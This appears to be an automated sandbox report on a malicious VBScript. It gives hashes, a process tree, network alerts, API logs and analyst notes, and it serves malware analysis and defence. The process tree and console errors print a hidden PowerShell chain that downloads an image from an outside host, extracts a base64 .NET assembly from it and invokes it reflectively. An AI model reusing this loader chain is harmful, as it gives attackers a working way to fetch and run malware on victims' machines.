Summary | ZeroBOX

xlaexpoittt.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 28, 2023, 7:05 p.m. Oct. 28, 2023, 7:08 p.m.
Size 107.4KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 08c5dddd1b41a03887c72314ea20d249
SHA256 1b09ed0d4abe06007e787ae5457a1fc814432ad38df811c861731a0bdc27fcc2
CRC32 4BB539E4
ssdeep 1536:F+5WIWde4Mi3mI2hb7KZ18C2NGkikGkFjGkikGkKEt0eEKU+kCKGWGPrbrbTDDp5:oWIWdeBQZxNj53e
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xlaexpoittt.vbs

    800
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2132
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2228

IP Address Status Action
104.21.84.67 Active Moloch
121.254.136.18 Active Moloch
164.124.101.2 Active Moloch
172.67.215.45 Active Moloch

Suricata Alerts

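[Analyst note: the SSLBL JA3 alert below fires on both TLS flows, the one to 104.21.84.67 (certificate CN=paste.ee) and the one to 172.67.215.45 (certificate CN=uploaddeimagens.com.br). A JA3 hash fingerprints the client's TLS stack rather than a malware family, so the "Tofsee" label most likely reflects the Windows 7 guest's TLS client and is not by itself evidence of Tofsee.]
Flow SID Signature Category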
TCP 192.168.56.103:49161 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.103:49161 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 172.67.215.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49161
104.21.84.67:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15
TLSv1
192.168.56.103:49167
172.67.215.45:443
C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
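[Analyst note: the WriteConsoleW buffers below are PowerShell error text for the second-stage command. DownloadData failed with "Could not establish trust relationship for the SSL/TLS secure channel", and the GetString and IndexOf calls that follow then failed on null values. The embedded assembly therefore appears not to have been loaded in this run, so the absence of later-stage behaviour in this report does not show that the sample is harmless. The trust failure may be an artefact of the Windows 7 guest's certificate store rather than of the sample.]
Time & API Arguments Status Return Repeated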

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:177
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: bClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: .GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: sa' , 'de' , 'cu'))
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: At line:1 char:240
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ring <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: sa' , 'de' , 'cu'))
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: At line:1 char:346
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: ring($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f54d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003f54d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005ce690
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005ce710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005ce710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005ce710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://paste.ee/d/hgAnq
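[Analyst note: every allocation listed below is in process 2132, the first powershell.exe in the process tree, and uses process_handle 0xffffffff (the calling process itself), so no cross-process memory write is recorded here. PowerShell hosts the .NET runtime, whose JIT compiler routinely allocates PAGE_EXECUTE_READWRITE pages; on their own these entries are weak evidence of injected code and should be weighed together with the command lines and network activity.]
Time & API Arguments Status Return Repeated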

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02470000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2132
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2132
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02471000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02472000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02523000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02524000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02582000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02526000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02583000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02584000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02585000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02586000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02587000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02588000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02589000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f15000
